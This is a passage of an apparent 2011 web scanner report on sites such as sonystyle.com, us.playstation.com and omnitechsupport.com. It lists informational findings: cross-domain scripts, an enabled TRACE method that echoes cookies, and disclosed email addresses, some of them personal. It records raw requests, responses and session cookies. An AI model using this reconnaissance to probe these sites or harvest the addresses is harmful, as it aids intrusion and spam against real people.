http://a2.twimg.com/a/1308769086/javascripts/lib/gears_init.js?1308259133
http://a2.twimg.com/a/1308769086/javascripts/lib/jquery.tipsy.min.js?1308259133
http://a3.twimg.com/a/1308769086/javascripts/lib/mustache.js?1308259133
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /sonyoutletusa HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:33 GMT
Server: hi
Status: 200 OK
X-Transaction: 1308842373-2439-32037
ETag: "face9414ffcb37b56c235fd4a36ddf88"
X-Frame-Options: SAMEORIGIN
Last-Modified: Thu, 23 Jun 2011 15:19:33 GMT
X-Runtime: 0.00853
Content-Type: text/html; charset=utf-8
Content-Length: 19872
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 2a867da6018348b9ab53639033d7a20fdada72a0
Set-Cookie: k=173.193.214.243.1308842373290278; path=/; expires=Thu, 30-Jun-11 15:19:33 GMT; domain=.twitter.com
Set-Cookie: guest_id=130884237329990406; path=/; expires=Sat, 23 Jul 2011 15:19:33 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCLWwFb0wAToHaWQiJTJhY2JhYzVmNTU0YjJj%250AYmZhNWMyNDRmNDVkODk5OGIwIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--8c7fe27671279233551b5c47933be7b27d397a15; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1308769086/javascripts/twitter.js?1308259133" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1308769086/javascripts/lib/jquery.tipsy.min.js?1308259133" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1308769086/javascripts/lib/gears_init.js?1308259133" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1308769086/javascripts/lib/mustache.js?1308259133" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1308769086/javascripts/geov1.js?1308259132" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1308769086/javascripts/api.js?1308259132" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a3.twimg.com/a/1308769086/javascripts/lib/mustache.js?1308259133" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1308769086/javascripts/dismissable.js?1308259132" type="text/javascript"></script>
...[SNIP]...

11.3. http://us.playstation.com/psn/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://us.playstation.com
Path:	/psn/

Issue detail

The response dynamically includes the following scripts from other domains:

http://webassets.scea.com/pscomauth/groups/public/documents/webasset/usps_ga_code.js
http://webassetsa.scea.com/pscomauth/groups/public/documents/webasset/ps_login_js.js
http://webassetsb.scea.com/pscomauth/groups/public/documents/webasset/jquery_tools_min.js
http://webassetsb.scea.com/pscomauth/groups/public/documents/webasset/ps_fx_js.js
http://webassetsc.scea.com/pscomauth/groups/public/documents/webasset/ps_tick_combined_js.js
http://webassetsc.scea.com/pscomauth/groups/public/documents/webasset/ps_uspsglobal_js.js
http://webassetsd.scea.com/pscomauth/groups/public/documents/webasset/ticker.js
http://webassetse.scea.com/pscomauth/groups/public/documents/webasset/ps_ticker_js.js
http://webassetsf.scea.com/pscomauth/groups/public/documents/webasset/usps_s_code.js
http://webassetsg.scea.com/pscomauth/groups/public/documents/webasset/ps_mbox_js.js
http://webassetsh.scea.com/pscomauth/groups/public/documents/webasset/swfobject.js
http://webassetsi.scea.com/pscomauth/groups/public/documents/webasset/ps_jquery-1.3.2.min_js.js
http://webassetsj.scea.com/pscomauth/groups/public/documents/webasset/pscommon.js

Request

GET /psn/ HTTP/1.1
Host: us.playstation.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:34 GMT
Server: Apache
Last-Modified: Wed, 08 Jun 2011 20:21:19 GMT
ETag: "b2058a-f02f-4a539144aadc0"
Accept-Ranges: bytes
Content-Length: 61487
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Set-Cookie: SONYCOOKIE1=2741283008.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">    <head><meta http-equi
...[SNIP]...
            <script type="text/javascript" src="http://webassetsg.scea.com/pscomauth/groups/public/documents/webasset/ps_mbox_js.js"></script>
...[SNIP]...
         <script type="text/javascript" src="http://webassetsh.scea.com/pscomauth/groups/public/documents/webasset/swfobject.js" charset="utf-8"></script>        <script type="text/javascript" src="http://webassetsi.scea.com/pscomauth/groups/public/documents/webasset/ps_jquery-1.3.2.min_js.js" charset="utf-8"></script>        <script type="text/javascript" src="http://webassetsj.scea.com/pscomauth/groups/public/documents/webasset/pscommon.js"></script>                        <script type="text/javascript" src="http://webassets.scea.com/pscomauth/groups/public/documents/webasset/usps_ga_code.js"></script>
...[SNIP]...
</script>                <script type="text/javascript" src="http://webassetsb.scea.com/pscomauth/groups/public/documents/webasset/ps_fx_js.js" charset="utf-8"></script>        <script type="text/javascript" src="http://webassetsc.scea.com/pscomauth/groups/public/documents/webasset/ps_uspsglobal_js.js" charset="utf-8"></script>
...[SNIP]...
</div> <script type="text/javascript" src="http://webassetsa.scea.com/pscomauth/groups/public/documents/webasset/ps_login_js.js" charset="utf-8"> </script>
...[SNIP]...
                <script type="text/javascript" src="http://webassetsb.scea.com/pscomauth/groups/public/documents/webasset/jquery_tools_min.js"></script><script type="text/javascript" src="http://webassetsc.scea.com/pscomauth/groups/public/documents/webasset/ps_tick_combined_js.js"></script><script type="text/javascript" src="http://webassetsd.scea.com/pscomauth/groups/public/documents/webasset/ticker.js"></script>
...[SNIP]...
<div id="tickerItemHolder">        <script type="text/javascript" src="http://webassetse.scea.com/pscomauth/groups/public/documents/webasset/ps_ticker_js.js">        </script>
...[SNIP]...
</div> <script type="text/javascript" src="http://webassetsf.scea.com/pscomauth/groups/public/documents/webasset/usps_s_code.js"></script>
...[SNIP]...
                <SCRIPT type="text/javascript" src="http://webassetsg.scea.com/pscomauth/groups/public/documents/webasset/ps_mbox_js.js"></script>
...[SNIP]...

11.4. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/L8yUExs-fkD.js
http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/XhueOm5bqOx.js
http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/SogayxsfDSh.js
http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/NMbCdi3OCeH.js
http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/Juua_Gv7yKY.js
http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/PD7V_khohjs.js

Request

Response

11.5. http://www.facebook.com/sonyelectronics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/sonyelectronics

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/Juua_Gv7yKY.js

Request

GET /sonyelectronics HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.6. http://www.flickr.com/groups/sonycameraclub previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flickr.com
Path:	/groups/sonycameraclub

Issue detail

The response dynamically includes the following script from another domain:

http://l.yimg.com/g/combo/1/3.3.0?j/.GD/3.3.0/.GD/.GD-.E.A.vSKm7&j/.GD/3.3.0/.FN/.FN-.E.A.vSKm7

Request

GET /groups/sonycameraclub HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.7. http://www.flickr.com/groups/sonycameraclub/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flickr.com
Path:	/groups/sonycameraclub/

Issue detail

The response dynamically includes the following script from another domain:

http://l.yimg.com/g/combo/1/3.3.0?j/.GD/3.3.0/.GD/.GD-.E.A.vSKm7&j/.GD/3.3.0/.FN/.FN-.E.A.vSKm7

Request

GET /groups/sonycameraclub/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.8. http://www.huddletogether.com/projects/lightbox2/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huddletogether.com
Path:	/projects/lightbox2/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /projects/lightbox2/ HTTP/1.1
Host: www.huddletogether.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:43 GMT
Server: Apache
Last-Modified: Fri, 18 Mar 2011 17:56:45 GMT
ETag: "a0be022-2f25-49ec5804b3140"
Accept-Ranges: bytes
Content-Length: 12069
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>

<title>Lightbox 2<
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

11.9. http://www.omnitechsupport.com/about.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omnitechsupport.com
Path:	/about.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32487

<html>
<head>
<title>Remote computer maintenance, remote pc help desk & pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
</table>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

11.10. http://www.omnitechsupport.com/spyware_removal.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omnitechsupport.com
Path:	/spyware_removal.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42222

<html>
<head>
<title>Spyware Removal | Spyware Adware Remove</title>
<meta name="description" content="Omnitechsupport.com offers complete 24/7 spyware removal services and effective spyware adware
...[SNIP]...
</table>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

11.11. http://www.opensource.org/licenses/mit-license.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opensource.org
Path:	/licenses/mit-license.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.12. http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/CategoryDisplay

Issue detail

The response dynamically includes the following script from another domain:

http://nexus2.ensighten.com/sony/Bootstrap.js

Request

GET /webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&identifier=S_SonyStyle_Stores HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 82841
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:00 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 82841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<link rel="canonical" href="http://www.sonystyle.com/c/S_SonyStyle_Stores/e
...[SNIP]...

<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...

11.13. http://www.sonystyle.com/webapp/wcs/stores/servlet/ContentDisplayView previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/ContentDisplayView

Issue detail

The response dynamically includes the following script from another domain:

http://nexus2.ensighten.com/sony/Bootstrap.js

Request

GET /webapp/wcs/stores/servlet/ContentDisplayView HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 72229
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:02 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 72229

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...

11.14. http://www.sonystyle.com/webapp/wcs/stores/servlet/OrderItemDisplay previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/OrderItemDisplay

Issue detail

The response dynamically includes the following script from another domain:

http://nexus2.ensighten.com/sony/Bootstrap.js

Request

GET /webapp/wcs/stores/servlet/OrderItemDisplay HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.15. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYNewsletterOptInView previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/SYNewsletterOptInView

Issue detail

The response dynamically includes the following script from another domain:

http://nexus2.ensighten.com/sony/Bootstrap.js

Request

GET /webapp/wcs/stores/servlet/SYNewsletterOptInView HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 76256
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:16 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 76256

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...

11.16. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYSiteMapView previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/SYSiteMapView

Issue detail

The response dynamically includes the following script from another domain:

http://nexus2.ensighten.com/sony/Bootstrap.js

Request

GET /webapp/wcs/stores/servlet/SYSiteMapView HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 162795
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:09 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 162795

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...

11.17. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYWishListDisplay previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/SYWishListDisplay

Issue detail

The response dynamically includes the following script from another domain:

http://nexus2.ensighten.com/sony/Bootstrap.js

Request

GET /webapp/wcs/stores/servlet/SYWishListDisplay HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.18. http://www.sonystyle.com/webapp/wcs/stores/servlet/SearchCatalog previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/SearchCatalog

Issue detail

The response dynamically includes the following script from another domain:

http://nexus2.ensighten.com/sony/Bootstrap.js

Request

GET /webapp/wcs/stores/servlet/SearchCatalog HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 92979
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:18 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 92979

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...

11.19. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/StoreCatalogDisplay

Issue detail

The response dynamically includes the following script from another domain:

http://nexus2.ensighten.com/sony/Bootstrap.js

Request

Response

11.20. https://www.sonystyle.com/webapp/wcs/stores/servlet/CRMPortalHome previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/CRMPortalHome

Issue detail

The response dynamically includes the following script from another domain:

https://nexus2.ensighten.com/sony/Bootstrap.js

Request

GET /webapp/wcs/stores/servlet/CRMPortalHome HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 78487
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:27 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: No-cache
Content-Length: 78487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...

12. TRACE method is enabled previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omnitechsupport.com
Path:	/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

Request

TRACE / HTTP/1.0
Host: www.omnitechsupport.com
Cookie: f89c5702c2142a6c

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 14:59:58 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.omnitechsupport.com
Cookie: f89c5702c2142a6c; model=VGNNR180E

13. Email addresses disclosed previous next
There are 12 instances of this issue:

http://www.flickr.com/groups/sonycameraclub
http://www.flickr.com/groups/sonycameraclub/
http://www.huddletogether.com/projects/lightbox2/
http://www.omnitechsupport.com/
http://www.omnitechsupport.com/about.php
http://www.omnitechsupport.com/fee.php
http://www.omnitechsupport.com/spyware_removal.php
http://www.opensource.org/licenses/mit-license.php
http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js
http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js
http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js
http://www.sonystyle.com/webapp/wcs/stores/servlet/SYNewsletterOptInView

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

13.1. http://www.flickr.com/groups/sonycameraclub previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flickr.com
Path:	/groups/sonycameraclub

Issue detail

The following email address was disclosed in the response:

peter@snapoftheshutter.com

Request

GET /groups/sonycameraclub HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.2. http://www.flickr.com/groups/sonycameraclub/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flickr.com
Path:	/groups/sonycameraclub/

Issue detail

The following email address was disclosed in the response:

peter@snapoftheshutter.com

Request

GET /groups/sonycameraclub/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.3. http://www.huddletogether.com/projects/lightbox2/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huddletogether.com
Path:	/projects/lightbox2/

Issue detail

The following email address was disclosed in the response:

lokesh.dhakar@gmail.com

Request

GET /projects/lightbox2/ HTTP/1.1
Host: www.huddletogether.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:43 GMT
Server: Apache
Last-Modified: Fri, 18 Mar 2011 17:56:45 GMT
ETag: "a0be022-2f25-49ec5804b3140"
Accept-Ranges: bytes
Content-Length: 12069
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>

<title>Lightbox 2<
...[SNIP]...
<input type="hidden" name="business" value="lokesh.dhakar@gmail.com" />
...[SNIP]...

13.4. http://www.omnitechsupport.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omnitechsupport.com
Path:	/

Issue detail

The following email addresses were disclosed in the response:

sales@omnitechsupport.com
support@omnitechsupport.com

Request

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:14:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39435

<html>
<head>
<title>Tech Support | IT Support | Online IT Support - Omnitechsupport.com</title>
<meta name="description" content="Omnitechsupport.com, the nation's leading tech support and IT supp
...[SNIP]...
<a href="mailto:support@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...

13.5. http://www.omnitechsupport.com/about.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omnitechsupport.com
Path:	/about.php

Issue detail

The following email addresses were disclosed in the response:

sales@omnitechsupport.com
support@omnitechsupport.com

Request

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32487

<html>
<head>
<title>Remote computer maintenance, remote pc help desk & pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<a href="mailto:support@omnitechsupport.com">
...[SNIP]...
<a href="mailto:support@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...

13.6. http://www.omnitechsupport.com/fee.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omnitechsupport.com
Path:	/fee.php

Issue detail

The following email addresses were disclosed in the response:

sales@omnitechsupport.com
support@omnitechsupport.com

Request

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49283

<html>
<head>
<title>Remote computer maintenance, remote pc help desk & pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<a href="mailto:support@omnitechsupport.com">
...[SNIP]...
<a href="mailto:support@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...

13.7. http://www.omnitechsupport.com/spyware_removal.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omnitechsupport.com
Path:	/spyware_removal.php

Issue detail

The following email addresses were disclosed in the response:

sales@omnitechsupport.com
support@omnitechsupport.com

Request

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42222

<html>
<head>
<title>Spyware Removal | Spyware Adware Remove</title>
<meta name="description" content="Omnitechsupport.com offers complete 24/7 spyware removal services and effective spyware adware
...[SNIP]...
<a href="mailto:support@omnitechsupport.com">
...[SNIP]...
<a href="mailto:support@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...

13.8. http://www.opensource.org/licenses/mit-license.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opensource.org
Path:	/licenses/mit-license.php

Issue detail

The following email addresses were disclosed in the response:

osi@opensource.org
webmaster@opensource.org

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
